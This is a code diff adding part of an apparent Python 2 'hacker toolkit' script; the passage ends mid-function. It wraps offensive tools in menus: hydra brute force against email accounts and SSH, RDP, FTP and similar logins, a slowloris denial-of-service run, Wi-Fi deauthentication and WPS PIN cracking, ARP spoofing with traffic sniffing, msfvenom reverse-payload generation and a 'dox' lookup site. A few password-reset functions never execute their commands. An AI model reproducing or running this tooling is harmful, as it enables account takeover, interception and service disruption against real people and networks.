+#HYDRA AUTOMATED START# +#---------------------# +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + + +#MONITOR MODE OFF START# +#----------------------# +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +#---------------------# +#SCAN SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# +#----------------------# +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +#--------------------# +#DEFAULT WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + os.system("cat /root/hackers-tool-kit/tools/formats.txt") + s = raw_input("Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) + os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + +#WORDLIST MAKER START# +#--------------------# +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + 